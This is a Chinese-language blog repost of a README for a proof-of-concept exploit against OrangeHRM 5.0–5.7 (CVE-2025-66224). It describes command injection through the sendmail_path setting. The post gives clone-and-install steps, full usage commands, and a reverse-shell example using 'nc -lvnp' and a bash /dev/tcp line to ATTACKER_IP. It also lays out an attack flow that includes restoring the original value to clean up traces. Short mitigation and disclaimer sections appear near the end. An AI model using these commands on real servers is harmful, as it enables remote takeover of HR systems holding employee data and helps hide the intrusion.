OrangeHRM RCE 最新漏洞利用 - CVE-2025-66224

zhengfei6112025-12-24 22:09

📋 描述

该概念验证(PoC)通过配置参数中的命令注入,展示了OrangeHRM中的远程代码执行(RCE)漏洞。sendmail_path

该漏洞的工作原理是:

  1. 向MySQL数据库(表)注入恶意负载hs_hr_config

  2. 通过电子邮件配置API端点触发负载执行

  3. 自动恢复原始值以清理走线

🎯 受影响版本

  • OrangeHRM 版本 5.0 至 5.7

⚠️免责声明

该工具仅供教育和授权安全测试目的。未经授权访问计算机系统是非法的。作者不对该工具造成的任何滥用或损害负责。

🔧 要求

复制代码
复制代码

pip install requests mysql-connector-python

📦 安装

复制代码
复制代码

git clone https://github.com/richard-natan/PoC-CVE-2025-66224 cd PoC-CVE-2025-66224 pip install -r requirements.txt

🚀 用途

步骤1:获取会话Cookie

  1. 通过网页界面登录OrangeHRM

  2. 打开浏览器开发者工具(F12)

  3. 访问存储>Cookies(Firefox)或应用>Cookies(Chrome)

  4. 复制cookie值_orangehrm

步骤2:运行漏洞

复制代码
复制代码

python3 exploit.py -t <TARGET_URL> -c <COOKIE_VALUE> \ -dh <MYSQL_HOST> -du <MYSQL_USER> -dp <MYSQL_PASSWORD> \ -cmd '<COMMAND_TO_EXECUTE>'

示例 - 简单命令

复制代码
复制代码

python3 exploit.py -t http://127.0.0.1:8080/ \ -c "g58tak8pbnheseatv6dggvi31i" \ -dh 172.18.0.2 \ -du orange_user \ -dp orange_password \ -cmd "touch /tmp/pwned"

示例 - 反向壳

复制代码
复制代码

Start listener on attacker machine nc -lvnp 4444 # Execute exploit with reverse shell payload python3 exploit.py -t http://target.com/ \ -c "your_session_cookie" \ -dh 172.18.0.2 \ -du orange_user \ -dp orange_password \ -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

📝 参数

参数 短篇 必填 描述
--target -t 目标URL(例如,http://target.com)
--cookie -c 会话 Cookie 值
--cookie_name -cn Cookie 名称(默认:_orangehrm)
--command -cmd 执行目标命令
--db_host -dh MySQL 主机地址
--db_user -du MySQL 用户名
--db_pass -dp MySQL 密码
--db_port -dport MySQL移植版(默认:3306)

🔍 工作原理

漏洞详情

漏洞存在于邮件配置功能中,参数存储在数据库中,之后在未经过适当净化的情况下执行。sendmail_path

开发流程:

复制代码
复制代码
  1. Authenticate to OrangeHRM (obtain valid session cookie) ↓ 2. Connect to MySQL database ↓ 3. Locate hs_hr_config table ↓ 4. Update email_config.sendmail_path value: FROM: /usr/sbin/sendmail -bs TO: /usr/sbin/sendmail -bs && <PAYLOAD> # ↓ 5. Trigger execution via API: PUT /web/index.php/api/v2/admin/email-configuration ↓ 6. Command executes on server ↓ 7. Restore original value (cleanup)

技术细节

脆弱参数: email_config.sendmail_path

数据库:

  • 表格:hs_hr_config

  • 列:= 'email_config.sendmail_path'name

  • 列:= sendmail 命令路径value

触发终点:

PUT /web/index.php/api/v2/admin/email-configuration

🛡️ 缓解措施

  1. 输入验证:对参数实施严格验证sendmail_path

  2. 逃脱:执行前正确转义 shell 命令

  3. 最低特权:以最小权限运行网页服务器

  4. 更新:为 OrangeHRM 应用最新的安全补丁

🔗 参考文献

⚠️请负责任地使用。检测前务必获得适当授权。

相关推荐
倔强的石头_9 小时前
kingbase备份与恢复实战(二)—— sys_dump库级逻辑备份与恢复(Windows详细步骤)
数据库
jiayou642 天前
KingbaseES 实战:深度解析数据库对象访问权限管理
数据库
李广坤2 天前
MySQL 大表字段变更实践(改名 + 改类型 + 改长度)
数据库
爱可生开源社区3 天前
2026 年,优秀的 DBA 需要具备哪些素质?
数据库·人工智能·dba
随逸1774 天前
《从零搭建NestJS项目》
数据库·typescript
加号34 天前
windows系统下mysql多源数据库同步部署
数据库·windows·mysql
シ風箏4 天前
MySQL【部署 04】Docker部署 MySQL8.0.32 版本(网盘镜像及启动命令分享)
数据库·mysql·docker
李慕婉学姐4 天前
Springboot智慧社区系统设计与开发6n99s526(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库·spring boot·后端
百锦再4 天前
Django实现接口token检测的实现方案
数据库·python·django·sqlite·flask·fastapi·pip
tryCbest4 天前
数据库SQL学习
数据库·sql
热门推荐
01GitHub 镜像站点02OpenClaw + 飞书(Feishu)环境搭建指南03OpenClaw 使用和管理 MCP 完全指南04【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06OpenClaw优化飞书API 额度已耗尽问题07小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)08Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤09Window 10部署openclaw报错node.exe : npm error code 12810OpenClaw大龙虾机器人完整安装教程